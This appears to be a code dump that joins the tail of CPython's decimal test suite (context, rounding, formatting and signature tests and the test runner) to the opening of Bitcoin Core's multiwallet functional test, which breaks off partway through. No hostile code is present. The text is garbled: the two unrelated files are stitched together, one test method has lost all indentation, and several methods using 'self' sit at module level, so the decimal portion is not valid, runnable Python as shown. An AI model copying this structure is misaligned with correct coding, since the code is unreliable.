    def test_c_valid_context(self):
        # These tests are for code coverage in _decimal.
        DefaultContext = C.DefaultContext
        Clamped = C.Clamped
        Underflow = C.Underflow
        Inexact = C.Inexact
        Rounded = C.Rounded
        Subnormal = C.Subnormal
        c = DefaultContext.copy()
        # Exercise all getters and setters
        c.prec = 34
        c.rounding = ROUND_HALF_UP
        c.Emax = 3000
        c.Emin = -3000
        c.capitals = 1
        c.clamp = 0
        self.assertEqual(c.prec, 34)
        self.assertEqual(c.rounding, ROUND_HALF_UP)
        self.assertEqual(c.Emin, -3000)
        self.assertEqual(c.Emax, 3000)
        self.assertEqual(c.capitals, 1)
        self.assertEqual(c.clamp, 0)
        # Etiny/Etop are derived from Emin/Emax and prec.
        self.assertEqual(c.Etiny(), -3033)
        self.assertEqual(c.Etop(), 2967)
        # Exercise all unsafe setters
        if C.MAX_PREC == 425000000:
            c._unsafe_setprec(999999999)
            c._unsafe_setemax(999999999)
            c._unsafe_setemin(-999999999)
            self.assertEqual(c.prec, 999999999)
            self.assertEqual(c.Emax, 999999999)
            self.assertEqual(c.Emin, -999999999)
    @requires_extra_functionality
    def test_c_valid_context_extra(self):
        # _allcr (all-correct-rounding) toggles between 1 and 0.
        DefaultContext = C.DefaultContext
        c = DefaultContext.copy()
        self.assertEqual(c._allcr, 1)
        c._allcr = 0
        self.assertEqual(c._allcr, 0)
def test_c_round(self):
# Restricted input.
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
localcontext = C.localcontext
MAX_EMAX = C.MAX_EMAX
MIN_ETINY = C.MIN_ETINY
int_max = 2**63-1 if C.MAX_PREC > 425000000 else 2**31-1
with localcontext() as c:
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
-int_max-1)
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
int_max)
self.assertRaises(InvalidOperation, Decimal("1").__round__,
int(MAX_EMAX+1))
self.assertRaises(C.InvalidOperation, Decimal("1").__round__,
-int(MIN_ETINY-1))
self.assertRaises(OverflowError, Decimal("1.23").__round__,
-int_max-2)
self.assertRaises(OverflowError, Decimal("1.23").__round__,
int_max+1)
    def test_c_format(self):
        # Restricted input
        Decimal = C.Decimal
        HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
        self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9)
        self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9)
        self.assertRaises(TypeError, Decimal(1).__format__, [])
        self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10")
        # A field width at the machine-integer limit must be rejected.
        maxsize = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
        self.assertRaises(ValueError, Decimal("1.23456789").__format__,
                          "=%d.1" % maxsize)
    def test_c_integral(self):
        """to_integral / to_integral_value / to_integral_exact: argument
        validation and rounding-mode behavior."""
        Decimal = C.Decimal
        Inexact = C.Inexact
        localcontext = C.localcontext
        x = Decimal(10)
        self.assertEqual(x.to_integral(), 10)
        self.assertRaises(TypeError, x.to_integral, '10')
        self.assertRaises(TypeError, x.to_integral, 10, 'x')
        self.assertRaises(TypeError, x.to_integral, 10)
        self.assertEqual(x.to_integral_value(), 10)
        self.assertRaises(TypeError, x.to_integral_value, '10')
        self.assertRaises(TypeError, x.to_integral_value, 10, 'x')
        self.assertRaises(TypeError, x.to_integral_value, 10)
        self.assertEqual(x.to_integral_exact(), 10)
        self.assertRaises(TypeError, x.to_integral_exact, '10')
        self.assertRaises(TypeError, x.to_integral_exact, 10, 'x')
        self.assertRaises(TypeError, x.to_integral_exact, 10)
        with localcontext() as c:
            x = Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP)
            self.assertEqual(x, Decimal('100000000000000000000000000'))
            x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP)
            self.assertEqual(x, Decimal('100000000000000000000000000'))
            # Only the _exact variant signals Inexact.
            c.traps[Inexact] = True
            self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP)
    def test_c_funcs(self):
        # Invalid arguments
        Decimal = C.Decimal
        InvalidOperation = C.InvalidOperation
        DivisionByZero = C.DivisionByZero
        getcontext = C.getcontext
        localcontext = C.localcontext
        self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9')
        self.assertRaises(TypeError, pow, Decimal(1), 2, "3")
        self.assertRaises(TypeError, Decimal(9).number_class, "x", "y")
        self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y")
        self.assertRaises(
            TypeError,
            Decimal("1.23456789").quantize, Decimal('1e-100000'), []
        )
        self.assertRaises(
            TypeError,
            Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext()
        )
        self.assertRaises(
            TypeError,
            Decimal("1.23456789").quantize, Decimal('1e-100000'), 10
        )
        self.assertRaises(
            TypeError,
            Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000
        )
        with localcontext() as c:
            c.clear_traps()
            # Invalid arguments
            self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y")
            self.assertRaises(TypeError, c.canonical, 200)
            self.assertRaises(TypeError, c.is_canonical, 200)
            self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y")
            self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y")
            self.assertEqual(str(c.canonical(Decimal(200))), '200')
            self.assertEqual(c.radix(), 10)
            # divmod by zero raises the trapped signal and still sets
            # the other condition's flag.
            c.traps[DivisionByZero] = True
            self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0)
            self.assertRaises(DivisionByZero, c.divmod, 9, 0)
            self.assertTrue(c.flags[InvalidOperation])
            c.clear_flags()
            c.traps[InvalidOperation] = True
            self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0)
            self.assertRaises(InvalidOperation, c.divmod, 9, 0)
            self.assertTrue(c.flags[DivisionByZero])
            c.traps[InvalidOperation] = True
            c.prec = 2
            self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501)
    def test_va_args_exceptions(self):
        """Keyword/positional argument validation of the C method wrappers."""
        Decimal = C.Decimal
        Context = C.Context
        x = Decimal("10001111111")
        # Unary methods taking only an optional context.
        for attr in ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10',
                     'logb', 'logical_invert', 'next_minus', 'next_plus',
                     'normalize', 'number_class', 'sqrt', 'to_eng_string']:
            func = getattr(x, attr)
            self.assertRaises(TypeError, func, context="x")
            self.assertRaises(TypeError, func, "x", context=None)
        # Binary methods taking an operand plus an optional context.
        for attr in ['compare', 'compare_signal', 'logical_and',
                     'logical_or', 'max', 'max_mag', 'min', 'min_mag',
                     'remainder_near', 'rotate', 'scaleb', 'shift']:
            func = getattr(x, attr)
            self.assertRaises(TypeError, func, context="x")
            self.assertRaises(TypeError, func, "x", context=None)
        self.assertRaises(TypeError, x.to_integral, rounding=None, context=[])
        self.assertRaises(TypeError, x.to_integral, rounding={}, context=[])
        self.assertRaises(TypeError, x.to_integral, [], [])
        self.assertRaises(TypeError, x.to_integral_value, rounding=None, context=[])
        self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[])
        self.assertRaises(TypeError, x.to_integral_value, [], [])
        self.assertRaises(TypeError, x.to_integral_exact, rounding=None, context=[])
        self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[])
        self.assertRaises(TypeError, x.to_integral_exact, [], [])
        self.assertRaises(TypeError, x.fma, 1, 2, context="x")
        self.assertRaises(TypeError, x.fma, 1, 2, "x", context=None)
        self.assertRaises(TypeError, x.quantize, 1, [], context=None)
        self.assertRaises(TypeError, x.quantize, 1, [], rounding=None)
        self.assertRaises(TypeError, x.quantize, 1, [], [])
        c = Context()
        self.assertRaises(TypeError, c.power, 1, 2, mod="x")
        self.assertRaises(TypeError, c.power, 1, "x", mod=None)
        self.assertRaises(TypeError, c.power, "x", 2, mod=None)
@requires_extra_functionality
def test_c_context_templates(self):
    """Default trap masks of the C BasicContext/DefaultContext templates."""
    # BasicContext traps everything except the informational signals
    # (Inexact/Rounded/Subnormal).
    self.assertEqual(
        C.BasicContext._traps,
        C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow|
        C.DecUnderflow|C.DecClamped
    )
    # DefaultContext additionally leaves Underflow and Clamped untrapped.
    self.assertEqual(
        C.DefaultContext._traps,
        C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow
    )
@requires_extra_functionality
def test_c_signal_dict(self):
    """Exercise the C SignalDict type backing Context.flags / Context.traps."""
    # SignalDict coverage
    Context = C.Context
    DefaultContext = C.DefaultContext

    InvalidOperation = C.InvalidOperation
    DivisionByZero = C.DivisionByZero
    Overflow = C.Overflow
    Subnormal = C.Subnormal
    Underflow = C.Underflow
    Rounded = C.Rounded
    Inexact = C.Inexact
    Clamped = C.Clamped

    DecClamped = C.DecClamped
    DecInvalidOperation = C.DecInvalidOperation
    DecIEEEInvalidOperation = C.DecIEEEInvalidOperation

    def assertIsExclusivelySet(signal, signal_dict):
        # Exactly `signal` is set; every other entry must be clear.
        for sig in signal_dict:
            if sig == signal:
                self.assertTrue(signal_dict[sig])
            else:
                self.assertFalse(signal_dict[sig])

    c = DefaultContext.copy()

    # Signal dict methods: keys()/values()/items() round-trip.
    self.assertTrue(Overflow in c.traps)
    c.clear_traps()
    for k in c.traps.keys():
        c.traps[k] = True
    for v in c.traps.values():
        self.assertTrue(v)
    c.clear_traps()
    for k, v in c.traps.items():
        self.assertFalse(v)

    # get() falls back to the default for unknown (non-signal) keys.
    self.assertFalse(c.flags.get(Overflow))
    self.assertIs(c.flags.get("x"), None)
    self.assertEqual(c.flags.get("x", "y"), "y")
    self.assertRaises(TypeError, c.flags.get, "x", "y", "z")

    self.assertEqual(len(c.flags), len(c.traps))
    # Smoke-test __sizeof__ and __repr__ only; results are unused.
    s = sys.getsizeof(c.flags)
    s = sys.getsizeof(c.traps)
    s = c.flags.__repr__()

    # Set flags/traps.
    c.clear_flags()
    c._flags = DecClamped
    self.assertTrue(c.flags[Clamped])

    c.clear_traps()
    c._traps = DecInvalidOperation
    self.assertTrue(c.traps[InvalidOperation])

    # Set flags/traps from dictionary.
    c.clear_flags()
    d = c.flags.copy()
    d[DivisionByZero] = True
    c.flags = d
    assertIsExclusivelySet(DivisionByZero, c.flags)

    c.clear_traps()
    d = c.traps.copy()
    d[Underflow] = True
    c.traps = d
    assertIsExclusivelySet(Underflow, c.traps)

    # Random constructors
    IntSignals = {
        Clamped: C.DecClamped,
        Rounded: C.DecRounded,
        Inexact: C.DecInexact,
        Subnormal: C.DecSubnormal,
        Underflow: C.DecUnderflow,
        Overflow: C.DecOverflow,
        DivisionByZero: C.DecDivisionByZero,
        InvalidOperation: C.DecIEEEInvalidOperation
    }
    IntCond = [
        C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError,
        C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError,
        C.DecConversionSyntax,
    ]

    lim = len(OrderedSignals[C])
    for r in range(lim):
        for t in range(lim):
            for round in RoundingModes:  # NOTE: shadows builtins.round inside this loop
                flags = random.sample(OrderedSignals[C], r)
                traps = random.sample(OrderedSignals[C], t)
                prec = random.randrange(1, 10000)
                emin = random.randrange(-10000, 0)
                emax = random.randrange(0, 10000)
                clamp = random.randrange(0, 2)
                caps = random.randrange(0, 2)
                cr = random.randrange(0, 2)  # NOTE(review): unused — confirm before removing
                c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax,
                            capitals=caps, clamp=clamp, flags=list(flags),
                            traps=list(traps))

                self.assertEqual(c.prec, prec)
                self.assertEqual(c.rounding, round)
                self.assertEqual(c.Emin, emin)
                self.assertEqual(c.Emax, emax)
                self.assertEqual(c.capitals, caps)
                self.assertEqual(c.clamp, clamp)

                # The private int masks must match the OR of the list args.
                f = 0
                for x in flags:
                    f |= IntSignals[x]
                self.assertEqual(c._flags, f)
                f = 0
                for x in traps:
                    f |= IntSignals[x]
                self.assertEqual(c._traps, f)

    # Internal-only conditions all surface through the dict as InvalidOperation.
    for cond in IntCond:
        c._flags = cond
        self.assertTrue(c._flags&DecIEEEInvalidOperation)
        assertIsExclusivelySet(InvalidOperation, c.flags)

    for cond in IntCond:
        c._traps = cond
        self.assertTrue(c._traps&DecIEEEInvalidOperation)
        assertIsExclusivelySet(InvalidOperation, c.traps)
def test_invalid_override(self):
    """Malformed locale overrides passed to __format__ must raise ValueError."""
    Decimal = C.Decimal

    try:
        from locale import CHAR_MAX
    except ImportError:
        self.skipTest('locale.CHAR_MAX not available')

    def grouping(*nums):
        # Encode a grouping spec the way locale does: one char per group size.
        return ''.join(chr(n) for n in nums)

    def fmt_with(value, override, spec='g'):
        return Decimal(value).__format__(spec, override)

    bad_grouping = {
        'decimal_point' : ',',
        'grouping' : grouping(255, 255, 0),
        'thousands_sep' : ','
    }
    bad_decimal_point = {
        'decimal_point' : 'xxxxx',
        'grouping' : grouping(3, 3, 0),
        'thousands_sep' : ','
    }
    bad_thousands_sep = {
        'decimal_point' : '.',
        'grouping' : grouping(3, 3, 0),
        'thousands_sep' : 'yyyyy'
    }

    if CHAR_MAX == 127:  # chr(255) reads as a negative grouping on this platform
        self.assertRaises(ValueError, fmt_with, 12345, bad_grouping)
    self.assertRaises(ValueError, fmt_with, 12345, bad_decimal_point)
    self.assertRaises(ValueError, fmt_with, 12345, bad_thousands_sep)
def test_exact_conversion(self):
    """With InvalidOperation trapped, out-of-range exponents in exact
    conversion raise instead of being clamped, overflowed or underflowed."""
    Decimal = C.Decimal
    localcontext = C.localcontext
    InvalidOperation = C.InvalidOperation

    with localcontext() as ctx:
        ctx.traps[InvalidOperation] = True
        # Clamped (zero coefficient, both exponent extremes), Overflow
        # and Underflow cases — each surfaces as InvalidOperation.
        for literal in ("0e%d" % sys.maxsize,
                        "0e%d" % (-sys.maxsize-1),
                        "1e%d" % sys.maxsize,
                        "1e%d" % (-sys.maxsize-1)):
            self.assertRaises(InvalidOperation, Decimal, literal)
def test_from_tuple(self):
    """Conversion from (sign, digits, exponent) tuples at the SSIZE limits."""
    Decimal = C.Decimal
    localcontext = C.localcontext
    InvalidOperation = C.InvalidOperation
    Overflow = C.Overflow
    Underflow = C.Underflow

    with localcontext() as c:
        c.traps[InvalidOperation] = True
        c.traps[Overflow] = True
        c.traps[Underflow] = True

        # SSIZE_MAX
        x = (1, (), sys.maxsize)
        # Zero coefficient: the context conversion clamps the exponent,
        # while exact Decimal() construction refuses it.
        self.assertEqual(str(c.create_decimal(x)), '-0E+999999')
        self.assertRaises(InvalidOperation, Decimal, x)
        x = (1, (0, 1, 2), sys.maxsize)
        self.assertRaises(Overflow, c.create_decimal, x)
        self.assertRaises(InvalidOperation, Decimal, x)

        # SSIZE_MIN
        x = (1, (), -sys.maxsize-1)
        self.assertEqual(str(c.create_decimal(x)), '-0E-1000007')
        self.assertRaises(InvalidOperation, Decimal, x)
        x = (1, (0, 1, 2), -sys.maxsize-1)
        self.assertRaises(Underflow, c.create_decimal, x)
        self.assertRaises(InvalidOperation, Decimal, x)

        # OverflowError: exponent does not even fit in a Py_ssize_t.
        x = (1, (), sys.maxsize+1)
        self.assertRaises(OverflowError, c.create_decimal, x)
        self.assertRaises(OverflowError, Decimal, x)
        x = (1, (), -sys.maxsize-2)
        self.assertRaises(OverflowError, c.create_decimal, x)
        self.assertRaises(OverflowError, Decimal, x)

        # Specials: exponent "N" means sNaN; the digits become the payload.
        x = (1, (), "N")
        self.assertEqual(str(Decimal(x)), '-sNaN')
        x = (1, (0,), "N")
        self.assertEqual(str(Decimal(x)), '-sNaN')
        x = (1, (0, 1), "N")
        self.assertEqual(str(Decimal(x)), '-sNaN1')
def test_sizeof(self):
    """__sizeof__ must grow by exactly one machine word per coefficient limb."""
    Decimal = C.Decimal
    # 64-bit builds store 19 decimal digits per 8-byte word,
    # 32-bit builds store 9 digits per 4-byte word.
    config_64 = C.MAX_PREC > 425000000

    self.assertGreater(Decimal(0).__sizeof__(), 0)

    digits_per_word, word_size = (19, 8) if config_64 else (9, 4)
    smaller = Decimal(10**(digits_per_word*24)).__sizeof__()
    larger = Decimal(10**(digits_per_word*25)).__sizeof__()
    self.assertEqual(larger, smaller + word_size)
def test_internal_use_of_overridden_methods(self):
    """from_float must not be confused by misbehaving float/int subclasses."""
    Decimal = C.Decimal

    # Unsound subtyping: each class lies through one overridden method.
    class X(float):
        # as_integer_ratio returns a non-tuple
        def as_integer_ratio(self):
            return 1
        def __abs__(self):
            return self

    class Y(float):
        # __abs__ returns a non-float
        def __abs__(self):
            return [1]*200

    class I(int):
        # bit_length returns a non-int
        def bit_length(self):
            return [1]*200

    class Z(float):
        # as_integer_ratio returns int-subclass members with a lying bit_length
        def as_integer_ratio(self):
            return (I(1), I(1))
        def __abs__(self):
            return self

    # Conversion must still agree with converting the plain float.
    for cls in X, Y, Z:
        self.assertEqual(Decimal.from_float(cls(101.1)),
                         Decimal.from_float(101.1))
def test_maxcontext_exact_arith(self):
    """Exact operations at maximum precision must not raise MemoryError."""
    # Make sure that exact operations do not raise MemoryError due
    # to huge intermediate values when the context precision is very
    # large.

    # The following functions fill the available precision and are
    # therefore not suitable for large precisions (by design of the
    # specification).
    # NOTE(review): MaxContextSkip is unused in this method — presumably
    # documentation mirroring deccheck.py; confirm before removing.
    MaxContextSkip = ['logical_invert', 'next_minus', 'next_plus',
                      'logical_and', 'logical_or', 'logical_xor',
                      'next_toward', 'rotate', 'shift']

    Decimal = C.Decimal
    Context = C.Context
    localcontext = C.localcontext

    # Here only some functions that are likely candidates for triggering a
    # MemoryError are tested. deccheck.py has an exhaustive test.
    maxcontext = Context(prec=C.MAX_PREC, Emin=C.MIN_EMIN, Emax=C.MAX_EMAX)
    with localcontext(maxcontext):
        self.assertEqual(Decimal(0).exp(), 1)
        self.assertEqual(Decimal(1).ln(), 0)
        self.assertEqual(Decimal(1).log10(), 0)
        self.assertEqual(Decimal(10**2).log10(), 2)
        self.assertEqual(Decimal(10**223).log10(), 223)
        self.assertEqual(Decimal(10**19).logb(), 19)
        self.assertEqual(Decimal(4).sqrt(), 2)
        self.assertEqual(Decimal("40E9").sqrt(), Decimal('2.0E+5'))
        self.assertEqual(divmod(Decimal(10), 3), (3, 1))
        self.assertEqual(Decimal(10) // 3, 3)
        self.assertEqual(Decimal(4) / 2, 2)
        self.assertEqual(Decimal(400) ** -1, Decimal('0.0025'))
@requires_docstrings
@unittest.skipUnless(C, "test requires C version")
class SignatureTest(unittest.TestCase):
    """Function signatures: the C implementation's introspectable signatures
    must agree with the pure-Python reference implementation."""

    def test_inspect_module(self):
        """Top-level callables of C and P agree in parameter names and kinds."""
        for attr in dir(P):
            if attr.startswith('_'):
                continue
            p_func = getattr(P, attr)
            c_func = getattr(C, attr)
            if (attr == 'Decimal' or attr == 'Context' or
                inspect.isfunction(p_func)):
                p_sig = inspect.signature(p_func)
                c_sig = inspect.signature(c_func)

                # parameter names (the Python version's private '_'-prefixed
                # parameters are not part of the public signature):
                c_names = list(c_sig.parameters.keys())
                p_names = [x for x in p_sig.parameters.keys() if not
                           x.startswith('_')]

                self.assertEqual(c_names, p_names,
                                 msg="parameter name mismatch in %s" % p_func)

                c_kind = [x.kind for x in c_sig.parameters.values()]
                p_kind = [x[1].kind for x in p_sig.parameters.items() if not
                          x[0].startswith('_')]

                # parameters:
                if attr != 'setcontext':
                    self.assertEqual(c_kind, p_kind,
                                     msg="parameter kind mismatch in %s" % p_func)

    def test_inspect_types(self):
        """Method signatures of Decimal/Context agree, and each method is
        callable with arguments built purely from its signature."""
        POS = inspect._ParameterKind.POSITIONAL_ONLY
        POS_KWD = inspect._ParameterKind.POSITIONAL_OR_KEYWORD

        # Type heuristic (type annotations would help!): a concrete sample
        # value for every parameter name that occurs in either module.
        pdict = {C: {'other': C.Decimal(1),
                     'third': C.Decimal(1),
                     'x': C.Decimal(1),
                     'y': C.Decimal(1),
                     'z': C.Decimal(1),
                     'a': C.Decimal(1),
                     'b': C.Decimal(1),
                     'c': C.Decimal(1),
                     'exp': C.Decimal(1),
                     'modulo': C.Decimal(1),
                     'num': "1",
                     'f': 1.0,
                     'rounding': C.ROUND_HALF_UP,
                     'context': C.getcontext()},
                 P: {'other': P.Decimal(1),
                     'third': P.Decimal(1),
                     'a': P.Decimal(1),
                     'b': P.Decimal(1),
                     'c': P.Decimal(1),
                     'exp': P.Decimal(1),
                     'modulo': P.Decimal(1),
                     'num': "1",
                     'f': 1.0,
                     'rounding': P.ROUND_HALF_UP,
                     'context': P.getcontext()}}

        def mkargs(module, sig):
            # Build concrete (args, kwargs) for `sig` from the pdict samples.
            args = []
            kwargs = {}
            for name, param in sig.parameters.items():
                if name == 'self': continue
                if param.kind == POS:
                    args.append(pdict[module][name])
                elif param.kind == POS_KWD:
                    kwargs[name] = pdict[module][name]
                else:
                    raise TestFailed("unexpected parameter kind")
            return args, kwargs

        def tr(s):
            """The C Context docstrings use 'x' in order to prevent confusion
            with the article 'a' in the descriptions."""
            if s == 'x': return 'a'
            if s == 'y': return 'b'
            if s == 'z': return 'c'
            return s

        def doit(ty):
            # Compare, then actually call, every public method of C.<ty>/P.<ty>.
            p_type = getattr(P, ty)
            c_type = getattr(C, ty)
            for attr in dir(p_type):
                if attr.startswith('_'):
                    continue
                p_func = getattr(p_type, attr)
                c_func = getattr(c_type, attr)
                if inspect.isfunction(p_func):
                    p_sig = inspect.signature(p_func)
                    c_sig = inspect.signature(c_func)

                    # parameter names:
                    p_names = list(p_sig.parameters.keys())
                    c_names = [tr(x) for x in c_sig.parameters.keys()]

                    self.assertEqual(c_names, p_names,
                                     msg="parameter name mismatch in %s" % p_func)

                    p_kind = [x.kind for x in p_sig.parameters.values()]
                    c_kind = [x.kind for x in c_sig.parameters.values()]

                    # 'self' parameter:
                    self.assertIs(p_kind[0], POS_KWD)
                    self.assertIs(c_kind[0], POS)

                    # remaining parameters:
                    if ty == 'Decimal':
                        self.assertEqual(c_kind[1:], p_kind[1:],
                                         msg="parameter kind mismatch in %s" % p_func)
                    else: # Context methods are positional only in the C version.
                        self.assertEqual(len(c_kind), len(p_kind),
                                         msg="parameter kind mismatch in %s" % p_func)

                    # Run the function:
                    args, kwds = mkargs(C, c_sig)
                    try:
                        getattr(c_type(9), attr)(*args, **kwds)
                    except Exception:
                        raise TestFailed("invalid signature for %s: %s %s" % (c_func, args, kwds))

                    args, kwds = mkargs(P, p_sig)
                    try:
                        getattr(p_type(9), attr)(*args, **kwds)
                    except Exception:
                        raise TestFailed("invalid signature for %s: %s %s" % (p_func, args, kwds))

        doit('Decimal')
        doit('Context')
# One C-implemented and one pure-Python test class per feature area; the
# entries deliberately alternate C, Py so the slice below can drop the C ones.
all_tests = [
  CExplicitConstructionTest, PyExplicitConstructionTest,
  CImplicitConstructionTest, PyImplicitConstructionTest,
  CFormatTest, PyFormatTest,
  CArithmeticOperatorsTest, PyArithmeticOperatorsTest,
  CThreadingTest, PyThreadingTest,
  CUsabilityTest, PyUsabilityTest,
  CPythonAPItests, PyPythonAPItests,
  CContextAPItests, PyContextAPItests,
  CContextWithStatement, PyContextWithStatement,
  CContextFlags, PyContextFlags,
  CSpecialContexts, PySpecialContexts,
  CContextInputValidation, PyContextInputValidation,
  CContextSubclassing, PyContextSubclassing,
  CCoverage, PyCoverage,
  CFunctionality, PyFunctionality,
  CWhitebox, PyWhitebox,
  CIBMTestCases, PyIBMTestCases,
]

# Delete C tests if _decimal.so is not present.
if not C:
    all_tests = all_tests[1::2]  # keep only the Py* classes (odd indices)
else:
    all_tests.insert(0, CheckAttributes)
    all_tests.insert(1, SignatureTest)
def test_main(arith=None, verbose=None, todo_tests=None, debug=None):
    """ Execute the tests.

    Runs all arithmetic tests if arith is True or if the "decimal" resource
    is enabled in regrtest.py

    todo_tests, when given, restricts the run to the named .decTest groups;
    debug is stored in the module-global DEBUG flag.
    """

    init(C)
    init(P)
    global TEST_ALL, DEBUG
    TEST_ALL = arith if arith is not None else is_resource_enabled('decimal')
    DEBUG = debug

    if todo_tests is None:
        test_classes = all_tests
    else:
        test_classes = [CIBMTestCases, PyIBMTestCases]

    # Dynamically build custom test definition for each file in the test
    # directory and add the definitions to the DecimalTest class. This
    # procedure insures that new files do not get skipped.
    for filename in os.listdir(directory):
        if '.decTest' not in filename or filename.startswith("."):
            continue
        head, tail = filename.split('.')
        if todo_tests is not None and head not in todo_tests:
            continue
        # f=filename binds the current name as a default, avoiding the
        # late-binding-closure pitfall.
        tester = lambda self, f=filename: self.eval_file(directory + f)
        setattr(CIBMTestCases, 'test_' + head, tester)
        setattr(PyIBMTestCases, 'test_' + head, tester)
        del filename, head, tail, tester

    try:
        run_unittest(*test_classes)
        if todo_tests is None:
            from doctest import IGNORE_EXCEPTION_DETAIL
            # Run the module doctests against each implementation by
            # temporarily installing it as sys.modules['decimal'].
            savedecimal = sys.modules['decimal']
            if C:
                sys.modules['decimal'] = C
                run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL)
            sys.modules['decimal'] = P
            run_doctest(P, verbose)
            sys.modules['decimal'] = savedecimal
    finally:
        # Always restore the saved contexts, even if a test failed.
        if C: C.setcontext(ORIGINAL_CONTEXT[C])
        P.setcontext(ORIGINAL_CONTEXT[P])
        if not C:
            warnings.warn('C tests skipped: no module named _decimal.',
                          UserWarning)
        if not orig_sys_decimal is sys.modules['decimal']:
            raise TestFailed("Internal error: unbalanced number of changes to "
                             "sys.modules['decimal'].")
if __name__ == '__main__':
    import optparse
    p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]")
    p.add_option('--debug', '-d', action='store_true', help='shows the test number and context before each test')
    p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests')
    (opt, args) = p.parse_args()

    if opt.skip:
        # --skip: run only a fraction of the arithmetic tests.
        test_main(arith=False, verbose=True)
    elif args:
        # Positional arguments name specific .decTest groups to run.
        test_main(arith=True, verbose=True, todo_tests=args, debug=opt.debug)
    else:
        test_main(arith=True, verbose=True)
|
wallet_multiwallet.py | #!/usr/bin/env python3
# Copyright (c) 2017-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a bitcoind node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import stat
import time
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import BitcoinTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
got_loading_error = False
def test_load_unload(node, name):
global got_loading_error
for _ in range(10):
if got_loading_error:
return
try:
node.loadwallet(name)
node.unloadwallet(name)
except JSONRPCException as e:
if e.error['code'] == -4 and 'Wallet already being loading' in e.error['message']:
got_loading_error = True
return
class MultiWalletTest(BitcoinTestFramework):
    """Functional test driving every multiwallet scenario on node0; node1 is
    only used for the cross-node database-lock checks near the end."""

    def set_test_params(self):
        # Two nodes; node0 starts with no wallet loaded (-nowallet).
        self.setup_clean_chain = True
        self.num_nodes = 2
        self.rpc_timeout = 120
        self.extra_args = [["-nowallet"], []]

    def skip_test_if_missing_module(self):
        self.skip_if_no_wallet()

    def add_options(self, parser):
        parser.add_argument(
            '--data_wallets_dir',
            default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
            help='Test data with wallet directories (default: %(default)s)',
        )

    def run_test(self):
        node = self.nodes[0]

        # Path helpers rooted at node0's data directory.
        data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
        wallet_dir = lambda *p: data_dir('wallets', *p)
        wallet = lambda name: node.get_wallet_rpc(name)

        def wallet_file(name):
            # Resolve a wallet name to its on-disk database file path.
            if name == self.default_wallet_name:
                return wallet_dir(self.default_wallet_name, self.wallet_data_filename)
            if os.path.isdir(wallet_dir(name)):
                return wallet_dir(name, "wallet.dat")
            return wallet_dir(name)

        assert_equal(self.nodes[0].listwalletdir(), { 'wallets': [{ 'name': self.default_wallet_name }] })

        # check wallet.dat is created
        self.stop_nodes()
        assert_equal(os.path.isfile(wallet_dir(self.default_wallet_name, self.wallet_data_filename)), True)

        # create symlink to verify wallet directory path can be referenced
        # through symlink
        os.mkdir(wallet_dir('w7'))
        os.symlink('w7', wallet_dir('w7_symlink'))

        os.symlink('..', wallet_dir('recursive_dir_symlink'))

        os.mkdir(wallet_dir('self_walletdat_symlink'))
        os.symlink('wallet.dat', wallet_dir('self_walletdat_symlink/wallet.dat'))

        # rename wallet.dat to make sure plain wallet file paths (as opposed to
        # directory paths) can be loaded
        # create another dummy wallet for use in testing backups later
        self.start_node(0)
        node.createwallet("empty")
        node.createwallet("plain")
        node.createwallet("created")
        self.stop_nodes()
        empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
        os.rename(wallet_file("empty"), empty_wallet)
        shutil.rmtree(wallet_dir("empty"))
        empty_created_wallet = os.path.join(self.options.tmpdir, 'empty.created.dat')
        os.rename(wallet_dir("created", self.wallet_data_filename), empty_created_wallet)
        shutil.rmtree(wallet_dir("created"))
        os.rename(wallet_file("plain"), wallet_dir("w8"))
        shutil.rmtree(wallet_dir("plain"))

        # restart node with a mix of wallet names:
        #   w1, w2, w3 - to verify new wallets created when non-existing paths specified
        #   w          - to verify wallet name matching works when one wallet path is prefix of another
        #   sub/w5     - to verify relative wallet path is created correctly
        #   extern/w6  - to verify absolute wallet path is created correctly
        #   w7_symlink - to verify symlinked wallet path is initialized correctly
        #   w8         - to verify existing wallet file is loaded correctly. Not tested for SQLite wallets as this is a deprecated BDB behavior.
        #   ''         - to verify default wallet file is created correctly
        to_create = ['w1', 'w2', 'w3', 'w', 'sub/w5', 'w7_symlink']
